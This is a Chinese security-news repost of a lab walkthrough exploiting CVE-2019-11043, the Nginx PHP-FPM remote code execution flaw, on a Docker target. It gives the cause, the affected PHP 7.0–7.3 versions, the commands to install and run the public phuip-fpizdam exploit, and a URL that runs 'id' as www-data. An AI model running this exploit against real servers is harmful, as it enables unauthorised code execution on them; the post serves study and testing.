1. 威客安全首页
  2. 安全资讯

CVE-2019-11043 简单利用

CVE-2019-11043 简单利用

CVE-2019-11043 是一个远程代码执行漏洞,使用某些特定配置的 Nginx PHP-FPM 的服务器存在漏洞,可允许攻击者远程执行代码。向Nginx PHP-FPM的服务器 URL发送 时,服务器返回异常。攻击者可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的Regexp。Regexp被损坏导致PATH_INFO为空,从而触发该漏洞。


影响范围

在 Nginx PHP-FPM 环境下,当启用了上述 Nginx 配置后,以下 PHP 版本受本次漏洞影响:
PHP 7.0 
PHP 7.1 
PHP 7.2 
PHP 7.3 


漏洞利用


首先访问漏洞环境,漏洞环境是用docker搭建的。


CVE-2019-11043 简单利用


攻击机是kali,攻击脚本是go语言写的所以要有go环境,从github上下载exp


go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam


CVE-2019-11043 简单利用


执行上面命令后,目录下就会生成 phuip-fpizdam 文件,然后执行攻击命令
./phuip-fpizdam 

http://192.168.123.49:8080/index.php


CVE-2019-11043 简单利用


在浏览器输入执行命令,查看当前id
http://192.168.123.49:8080/?a=id

CVE-2019-11043 简单利用


很明显攻击成功了,当前用户是www-data 还需要进一步提取呀!


注:本实验不得用于商业用途,仅做学习交流,一切后果自行承担。

CVE-2019-11043 简单利用


推荐文章++++

CVE-2019-11043 简单利用

*CVE-2018-14847 简单利用

*CVE-2019-16278 简单利用

*CVE-2017-10271 简单利用


CVE-2019-11043 简单利用

CVE-2019-11043 简单利用

原文始发于微信公众号(黑白之道):CVE-2019-11043 简单利用

本文转为转载文章,本文观点不代表威客安全立场。

发表评论

登录后才能评论